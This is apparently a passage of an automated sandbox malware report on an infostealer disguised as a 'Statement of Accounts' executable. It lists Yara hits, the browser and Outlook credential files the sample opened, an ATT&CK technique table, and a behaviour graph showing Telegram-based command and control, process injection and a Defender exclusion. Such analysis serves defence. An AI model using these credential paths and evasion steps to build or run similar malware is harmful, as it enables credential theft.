                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                211
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                11
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp
                Cached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync13
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1620673 Sample: [ID] Statement of Accounts-... Startdate: 21/02/2025 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 2 other IPs or domains 2->26 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 44 9 other signatures 2->44 8 [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 [ID] Statement of ...52003060444.exe.log, CSV 8->20 dropped 46 Modifies the context of a thread in another process (thread injection) 8->46 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe 14 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49801 TELEGRAMRU United Kingdom 12->28 30 checkip.dyndns.com 193.122.6.168, 49724, 49730, 49737 ORACLE-BMC-31898US United States 12->30 32 reallyfreegeoip.org 104.21.96.1, 443, 49726, 49729 CLOUDFLARENETUS United States 12->32 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 18 conhost.exe 16->18         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.